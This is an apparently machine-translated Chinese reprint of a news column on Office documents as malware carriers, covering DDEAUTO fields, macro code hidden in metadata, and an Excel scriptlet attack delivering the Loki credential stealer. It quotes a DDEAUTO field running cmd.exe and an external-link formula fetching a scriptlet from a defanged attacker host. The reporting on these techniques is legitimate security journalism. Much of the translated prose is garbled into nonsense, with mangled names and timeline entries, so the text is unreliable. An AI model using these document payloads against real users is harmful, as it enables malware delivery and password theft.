办公室作为恶意软件交付平台:DDE,scriptlet,宏混淆

2022-03-31 16:47:02来源:

我,因为一个人,以为办公室的恶意软件在20世纪90年代后期达到了Zenith,其中包括梅丽莎。当然,我们在过去的二十年中看到了基于宏的颈部痛苦的颈部仓库,包括一些专门攻击MAC的宏恶意软件,而是通过较大,单词,Excel和较小程度,PowerPoint现在抛出警告对话到中间的攻击。那些具有恶意意图的人已经转移到更环保的领域。

还是有他们?

一些聪明的研究人员已经找到了新的和意想不到的方法来获取Word,Excel和PowerPoint文档,以提供各种恶意软件 - 伦纸软件,即使是一个新发现的凭证偷窃师,专门收集用户名和密码。

在许多情况下,这些新用途采用旧的方法作为山丘。但旧的警告标志不起作用以及他们曾经做过:对截图中的挑战面临着截图,现在许多人,现在不会犹豫,点击是。

Woody Leonhard / IDG

{ddeauto}的力量

深入潜入词语,您可以找到一个名为字段的功能。尽可能地告诉我,宏之前存在字段。领域背后的想法很简单:您在文档中粘贴了一个字段代码,这个词可以以某种方式计算或放在一起。而不是向您展示现场代码,而是通过计算结果来计算并向您展示。例如,字段代码{页面}返回当前页码。

细节可能会变得棘手:我的黑客Windows Word的指南包含85页的字段代码及其overuse结果。在23年前,你好。

{ddeauto}字段代码必须返回Charles Simonyi的时间。它用于指示Word来启动另一个应用程序,并将数据放入该应用程序或从中拉数据。例如,该领域

{ddeauto Excel C://xldata//addrlist.xls r5c1:r5c9}

告诉Word要启动Excel,打开名为Addrlist.xls的文件,将行5列1的内容拉到9,并将它们粘在Word文档中。打开Word文档时{ddeauto}字段触发(这是“自动”部分)。

在检索(或发送)数据之前,Word踢出像上述屏幕截图中的警告消息。如果引用的程序未运行,则会收到一条额外的消息,询问启动应用程序是否可以。

Woody Leonhard / IDG

去年10月,Etienne Stalmans和Saif El-Sherei发布了一篇文章的SensePost博客,描述了一种完全正常的使用古代技术的方法。他们汇集了这一领域:

{ddeauto c://windows//system32//cmd.exe“/ k calc.exe”}

并发现它踢出Windows计算器,只要打开文档的人在这两个警告对话框中单击“是”。

[评论这个故事,请访问Computerworld的Facebook页面。]

起初,看起来很好:{ddeauto}正常工作,因为它在扑鼻缩弯的方式工作的方式,因为较冷的风扇。但是,我们中的一些人开始感到不安。是的,这就是它应该工作的方式 - 但是潜在的安全漏洞,值得增加的好处吗?

Twitter上的Kevin Beaumont(@Gossithedog)为火焰添加了更多的燃料:

还记得@SensePost找到的DDE问题这个词吗?将DDE从单词复制到Outlook中,然后将其电子邮件发送给某人。没有附着 - >计算。随着技术的方式,它非常甜蜜,因为AV扫描没有附件。Outlook使用Word作为电子邮件编辑器,它会产生ddeauto。奖金副作用 - 如果在组策略中禁用CMD.EXE,则它在声称禁用之前执行exe IN / K参数。

情况迅速恶化。匹兹堡(@AREKFURR)的高潮布莱恩(@AREKFURT)布置了时间表:

10/09: @SensePost博客文章(RE)发现和验证技术10/10:@Gossithedog推文关于,删除了10/11的信息:野外(FIN7)10/13:USAGE10 / 19的大浪涌开始:锁定/ necurs10 / 25:花哨的熊

到10月27日,我们在Computerworld提出了一条警告。11月8日,Microsoft发布的安全咨询4053440,其中描述了问题并提供了一些解决方案。

12月12日,作为本月的补丁周二的一部分,Microsoft发布了所有版本的单词的更新 - 即使是支持超出支持的Word 2003和Word 2007 - 通过禁用{ddeauto}和“自动更新来解决问题任何链接字段,包括DDE“一般。

每个安全咨询170021更新KB 4011575,4011590,4011608,4011612和4011614都包含更改,它们都禁用{ddeauto}。安装了修补程序后,将有新的注册表项可用,您可以手动更改以重新启用{ddeauto}。

Excel和PowerPoint尚未类似地蹒跚。它们都已经有手动访问的设置,禁用自动设置(文件>选项>信任中心>信任中心设置>外部内容)。

所以它看起来好像现在插入{ddeauto}孔。

Excel Stealthy Macros.

本周早些时候,Xavier Mertens在Sans Internet Storm Center博客上发表了一个照明黑客。通过元数据称为Microsoft Office VBA宏混淆,MERTENS找到了一种运行宏的方法,其中批量在电子表格的元数据中隐藏了庞大的部分。

当宏运行 - 并且用户必须单击以允许它运行 - 宏从元数据中提取恶意代码,绕过大多数恶意软件扫描仪。看起来像一个奇怪的宏观的看起来是一个奇怪的宏,结果是一个带着f牙的恶魔。

非常聪明。

Excel Scriptlet.

今天早些时候,Andy Norton在Security公司持续的终点,发布了通过Excel电子表格传递的攻击分析,不使用宏,不使用DDE,但确实使用外部链接开始了一个scriptlet。Scriptlet是“用于脚本语言的Microsoft XML包装器,以将自己注册为COM对象并执行”。

在攻击演示的核心上是一个如此如此如此:

=包/'脚本:http:// magchris [。] ga /图片/ squrey.xml'!“”

打开工作表时,Excel会提示用户有关更新外部链接,并且如果授予权限,则Scriptlet运行。在这种情况下,scriptlet踢了一个vbscript程序,这是肮脏的契约。

今天的公告包括在野外中找到的漏洞,该漏洞在安装用户名和密码窃取程序Loki中。诺顿通过病毒总量将电子表格放入,只有少数防病毒产品抓住它。诺顿说,人们追捕感染的来源,

必须通过各种日志来跟踪,直到他们找到与Gabon顶级域的连接,从下载可执行文件 - _OUTPUT23476823784.exe - 对受害者提供的免费Web托管服务提供。提供了此信息,他们将对第二阶段有效载荷进行进一步扫描,或者寻找有效载荷的已知IOC。

这是一个奇怪的新世界。

在askwoody休息室加入抱怨的灰色牛排。


返回科技金融网首页 >>

版权及免责声明:凡本网所属版权作品,转载时须获得授权并注明来源“科技金融网”,违者本网将保留追究其相关法律责任的权力。凡转载文章,不代表本网观点和立场,如有侵权,请联系我们删除。


相关文章